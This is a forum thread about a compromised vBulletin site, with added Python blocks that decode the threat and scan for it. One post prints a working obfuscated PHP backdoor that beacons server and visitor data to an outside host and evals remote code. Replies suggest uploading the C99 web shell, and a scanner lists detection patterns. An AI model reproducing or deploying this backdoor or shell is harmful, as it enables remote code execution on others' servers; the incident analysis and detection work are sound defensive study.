Did my website just get hacked?!?!

Discussion in 'Site & Server Administration' started by JPetrillo, Apr 21, 2009.

  1. #1
    I can't figure this out myself and it's a bit alarming...

    I was just browsing through Google search results for my website and came across this Google Cache which includes this link to my website!! Now, when I go to that directory (/public_html/forum/admincp/control_examples/) on my FTP server I do not see a "3picsex.html" which is what this link is linked to! And the link is actually working! The only files I can see in that directory are the standard vBulletin files, including the empty "index.html" page and the .htaccess file.

    What is going on here! And how do I fix this?!
     
    JPetrillo, Apr 21, 2009 IP
  2. hvalle98

    hvalle98 Well-Known Member

    Messages:
    460
    Likes Received:
    13
    Best Answers:
    0
    Trophy Points:
    135
    #2
    Maybe it's a mod_rewrite and the files are on a different folder.

    Are you using a nulled version of vbulletin? Those are known to be easier to hack. (Also, risky if your server is in the USA). Back up your files and restore the control_examples files with a previous backup. Also, change your password and check the file permissions.
     
    hvalle98, Apr 21, 2009 IP
  3. JPetrillo

    JPetrillo Peon

    Messages:
    120
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #3
    Nulled Version? No, I have the latest vBulletin version, which is 3.8.2. I just upgraded last week as a matter of fact.

    The /control_examples/ folder is CHMOD 777, lol. Maybe that is my problem? What should it be?
     
    JPetrillo, Apr 21, 2009 IP
  4. hvalle98 Well-Known Member
    #4
    Then post your problem here: http://www.vbulletin.com/forum/

    Chmod 777 can be dangerous because it gives all privileges to everyone. Try changing it to 755 and if everything works fine, then leave it like that.
     
    hvalle98, Apr 21, 2009 IP
  5. JPetrillo Peon
    #5
    I have already posted on vBulletin.com here and I'm currently in the middle of getting some help from them as well :)

    I replaced the files in the /control_examples/ folder with old files from a previous backup, and changed the CHMOD to 755, and that seemed to fix the problem. If I tried going to that link it gave me a 404 page not found error... PERFECT, right?!

    NOT...

    Now, about 1.5hrs later and that same link is working again!!! :eek:
     
    JPetrillo, Apr 21, 2009 IP
  6. hvalle98 Well-Known Member
    #6
    Have you told this to your webhost? (if you use a shared server) Maybe it's the server and not your webpage...
     
    hvalle98, Apr 21, 2009 IP
  7. JPetrillo Peon
    #7
    That is a possibility, it is shared. I know it's a brand new server too and I don't think there are many other websites on it (I think just one other site at the moment). I will have to tell them... they are usually on AIM, but they aren't right now. Otherwise I would have already told them. I'm too lazy to open a support ticket and all that BS tonight LOL

    I noticed there was some random .php file in that same directory. Check out the code:

```php
<?
error_reporting(0);
// Collect request details, falling back to the old register_globals names.
$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);
$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);
$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);
$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);
$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);
$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);
$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);
$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);
$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);
$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);
// Pack all of the above, base64-encoded and dot-separated, into a query string for the remote host.
$z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);
// "cnNzbmV3cy53cw==" decodes to "rssnews.ws".
$f=base64_decode("cnNzbmV3cy53cw==");
// Operator override: a request carrying the right "q" value swaps in whatever host is given in "id".
if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="4bb073b44030a7184c8396397677c874") $f=$_REQUEST["id"];
// Fetch and execute remote PHP, trying three hostnames in turn:
// "aHR0cDovL2Fkcy4=" = "http://ads.", "aHR0cDovLzcu" = "http://7.", "aHR0cDovLzcxLg==" = "http://71."
if((include(base64_decode("aHR0cDovL2Fkcy4=").$f.$z)));
else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c);
else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$o=curl_exec($cu);curl_close($cu);eval($o);};
die();
?>
```
    ...pretty crazy looking. I found very similar .php files in other random directories inside my forum directory! :eek:
     
    JPetrillo, Apr 21, 2009 IP
  8. bartic

    bartic Peon

    Messages:
    14
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #8
    It is somebody trying to create traffic with your website through
    http://71.rssnews.ws/

    It's base64 encoded.
     
    bartic, Apr 21, 2009 IP
  9. bartic Peon
    #9
    Sorry for the double post, but for some reason it's telling me that I have a sig link that doesn't exist so it won't let me edit my post...

    It also appends a bunch of stuff about your server to the URL. What it does with that info, I do not know.
     
    bartic, Apr 21, 2009 IP
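The decoding bartic describes in #8 and #9, carried through as an added example (this is not code from the thread or from the dropped script; the sample request values are constructed, and the real password behind the md5 is not known from the page). It decodes every base64 literal in the posted script, reconstructs the three hostnames it tries in order, rebuilds the `$z` beacon so you can see exactly which request fields get sent to the remote server, and mirrors the `q`/`id` gate that lets whoever knows the password redirect the fetch to any host:

```python
import base64
import hashlib
import os

# The four base64 literals copied from the dropped script, keyed by where each is used.
OBFUSCATED = {
    "default_host": "cnNzbmV3cy53cw==",      # assigned to $f
    "include_prefix": "aHR0cDovL2Fkcy4=",    # first attempt: include()
    "fgc_prefix": "aHR0cDovLzcu",            # second attempt: file_get_contents() + eval()
    "curl_prefix": "aHR0cDovLzcxLg==",       # third attempt: curl + eval()
}
# md5 of the operator's password as it appears in the script; the plaintext is not on the page.
TRIGGER_MD5 = "4bb073b44030a7184c8396397677c874"

# $_SERVER keys in the order the script encodes them into $z.
BEACON_FIELDS = [
    "HTTP_HOST", "SERVER_NAME", "REQUEST_URI", "PHP_SELF", "QUERY_STRING",
    "HTTP_REFERER", "HTTP_USER_AGENT", "REMOTE_ADDR", "SCRIPT_FILENAME",
    "HTTP_ACCEPT_LANGUAGE",
]


def decode_literals():
    """Decode every base64 string literal in the dropper."""
    return {name: base64.b64decode(b64).decode() for name, b64 in OBFUSCATED.items()}


def c2_urls(host=None):
    """The three hosts the script contacts, in the order it tries them."""
    lit = decode_literals()
    host = host or lit["default_host"]
    return [lit["include_prefix"] + host, lit["fgc_prefix"] + host, lit["curl_prefix"] + host]


def build_beacon_path(server):
    """Reproduce $z: "/?" plus dot-separated base64 of each field, with a literal "e"
    inserted before SCRIPT_FILENAME exactly as the script does."""
    parts = [base64.b64encode(server.get(k, "").encode()).decode() for k in BEACON_FIELDS]
    parts.insert(8, "e")
    return "/?" + ".".join(parts)


def parse_beacon_path(path):
    """Inverse of build_beacon_path; base64 output never contains '.', so splitting is safe."""
    parts = path[len("/?"):].split(".")
    parts.pop(8)  # drop the literal "e" marker
    return {k: base64.b64decode(p).decode() for k, p in zip(BEACON_FIELDS, parts)}


def operator_override(server, request):
    """Mirror the backdoor gate: the right "q" lets the requester point the fetch at the host in "id".
    $_REQUEST also covers POST and cookies, so the password need not appear in the URL."""
    same_name = (os.path.basename(server.get("REQUEST_URI", ""))
                 == os.path.basename(server.get("SCRIPT_FILENAME", "")))
    if same_name and "q" in request and hashlib.md5(request["q"].encode()).hexdigest() == TRIGGER_MD5:
        return request.get("id")
    return None


# Constructed sample request (not taken from the thread) to show what one beacon carries.
SAMPLE_SERVER = {
    "HTTP_HOST": "www.example.com",
    "SERVER_NAME": "www.example.com",
    "REQUEST_URI": "/forum/admincp/control_examples/somefile.php",
    "PHP_SELF": "/forum/admincp/control_examples/somefile.php",
    "QUERY_STRING": "",
    "HTTP_REFERER": "http://www.google.com/search?q=example",
    "HTTP_USER_AGENT": "Mozilla/5.0 (compatible; Googlebot/2.1)",
    "REMOTE_ADDR": "192.0.2.10",
    "SCRIPT_FILENAME": "/home/example/public_html/forum/admincp/control_examples/somefile.php",
    "HTTP_ACCEPT_LANGUAGE": "en-us",
}

if __name__ == "__main__":
    for name, value in decode_literals().items():
        print(f"{name:16} {value}")
    for url in c2_urls():
        print("fetches:", url + build_beacon_path(SAMPLE_SERVER))
    print("override with wrong password:",
          operator_override(SAMPLE_SERVER, {"q": "guess", "id": "evil.example"}))
```

The beacon tells the remote side the visitor's IP, referer and user agent, which is how this kind of script serves one page to Googlebot (the indexed "3picsex.html") and another, or nothing, to the site owner. Whatever the remote host returns is run with `eval()`, so the dropped file is a full remote-code-execution backdoor, not just a redirect.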
  10. JPetrillo Peon
    #10
    Do you think it has to do with that .php file? There are about 5 or 6 more scattered throughout the /forum/ directory.

    ...I guess I should delete those, right?
     
    JPetrillo, Apr 22, 2009 IP
  11. bartic Peon
    #11
    Yes, I'd delete those for sure. The issue is that if they managed to get those PHP files on your server they can also upload deadly PHP shells like C99 and R57, or in the worst case append more code to existing files. This is what I would do...

    You are probably dealing with a little script kiddie using the C99 shell. So go find a copy of this shell online and upload it to your server... you will be amazed at what it can do. This is what it will look like...
    Now you see on the right hand side the green permissions? Find the files with "drwxdrwxdr-x" permissions; those tell you what the hacker could have changed. So check those out!

    You say that you did a recent upgrade so they probably didn't get in through your forum VB is pretty secure. Probably cd'd from another site.
     
    bartic, Apr 22, 2009 IP
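As an added example (not from bartic's post and not a vBulletin tool), here is a way to do the hunt bartic describes, finding the other copies scattered through /forum/ and the world-writable directories, without uploading a C99 shell to your own server. It scans a tree for .php files that match several of the traits of the posted script at once (eval of a variable, base64 string literals, include of a decoded URL, an md5 gate on request input, error reporting switched off) and lists any directory with mode 777. The demo tree, file names and the shortened dropper variant are all constructed for the example:

```python
import os
import re
import stat
import tempfile

# Indicators drawn from the dropper posted in the thread. A file is flagged only when at least
# MIN_HITS match, so a single legitimate base64_decode() or eval() does not trip it.
INDICATORS = [
    ("eval_of_variable", re.compile(r"\beval\s*\(\s*\$\w+\s*\)")),
    ("base64_string_literal", re.compile(r"base64_decode\s*\(\s*['\"][A-Za-z0-9+/=]{8,}['\"]\s*\)")),
    ("include_of_decoded_url", re.compile(r"\b(?:include|require)(?:_once)?\s*\(\s*base64_decode")),
    ("md5_gate_on_request", re.compile(r"\bmd5\s*\(\s*\$_(?:REQUEST|GET|POST|COOKIE)\s*\[")),
    ("error_reporting_off", re.compile(r"\berror_reporting\s*\(\s*0\s*\)")),
]
MIN_HITS = 2


def scan_php_source(src):
    """Return the names of the indicators that match this PHP source."""
    return [name for name, rx in INDICATORS if rx.search(src)]


def scan_tree(root):
    """Walk root; return ({relative php path: [indicators]}, [world-writable dirs])."""
    flagged, writable = {}, []
    for dirpath, dirnames, filenames in os.walk(root):
        for d in dirnames:
            full = os.path.join(dirpath, d)
            if os.stat(full).st_mode & stat.S_IWOTH:   # the "7" in 777
                writable.append(os.path.relpath(full, root).replace(os.sep, "/"))
        for fn in filenames:
            if not fn.lower().endswith(".php"):
                continue
            full = os.path.join(dirpath, fn)
            with open(full, encoding="utf-8", errors="replace") as fh:
                hits = scan_php_source(fh.read())
            if len(hits) >= MIN_HITS:
                flagged[os.path.relpath(full, root).replace(os.sep, "/")] = hits
    return flagged, sorted(writable)


# Constructed samples (not files from the thread): a shortened variant of the posted dropper
# and a clean script that uses base64_decode() on a variable, which must not be flagged.
INFECTED_SAMPLE = ('<? error_reporting(0);$f=base64_decode("cnNzbmV3cy53cw==");'
                   'if((include(base64_decode("aHR0cDovL2Fkcy4=").$f)));'
                   'else if($c=file_get_contents("http://7.".$f))eval($c);die(); ?>')
CLEAN_SAMPLE = '<?php $payload = base64_decode($_POST["data"]); echo strlen($payload); ?>'


def demo():
    """Build a throwaway tree shaped like the one in the thread, scan it, return the findings."""
    with tempfile.TemporaryDirectory() as root:
        hot = os.path.join(root, "forum", "admincp", "control_examples")
        inc = os.path.join(root, "forum", "includes")
        os.makedirs(hot)
        os.makedirs(inc)
        for d in (os.path.join(root, "forum"), os.path.join(root, "forum", "admincp"), inc):
            os.chmod(d, 0o755)
        with open(os.path.join(hot, "index.html"), "w") as fh:
            fh.write("")                      # the empty vBulletin index.html
        with open(os.path.join(hot, "x7k.php"), "w") as fh:
            fh.write(INFECTED_SAMPLE)         # constructed name for the "random .php file"
        with open(os.path.join(inc, "functions.php"), "w") as fh:
            fh.write(CLEAN_SAMPLE)
        os.chmod(hot, 0o777)                  # the mode JPetrillo found on the directory
        flagged, writable = scan_tree(root)
    return {"flagged": flagged, "world_writable": writable}


if __name__ == "__main__":
    result = demo()
    for path, hits in result["flagged"].items():
        print(f"suspicious: {path}  ({', '.join(hits)})")
    for d in result["world_writable"]:
        print(f"world-writable: {d}")
```

Run it against a copy of public_html pulled down over FTP (`scan_tree("/path/to/public_html")`), then diff the flagged files against a clean vBulletin 3.8.2 download; a modified core file will not match these patterns if the attacker simply appended a plain include, so pairing the scan with a file-by-file comparison against the vendor package is what actually catches the "append more code to existing files" case bartic mentions.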
  12. JPetrillo Peon
    #12
    Thank you bartic for that information... that's more help/info than I have been able to get from vBulletin.com so far! :)

    I will look into this further and notify my webhost.

    Thanks again for your help!

    I'll let you know how I make out :)
     
    JPetrillo, Apr 22, 2009 IP
  13. hvalle98 Well-Known Member
    #13
    I can give you the c99 if you want (of course, just for good purposes)
     
    hvalle98, Apr 22, 2009 IP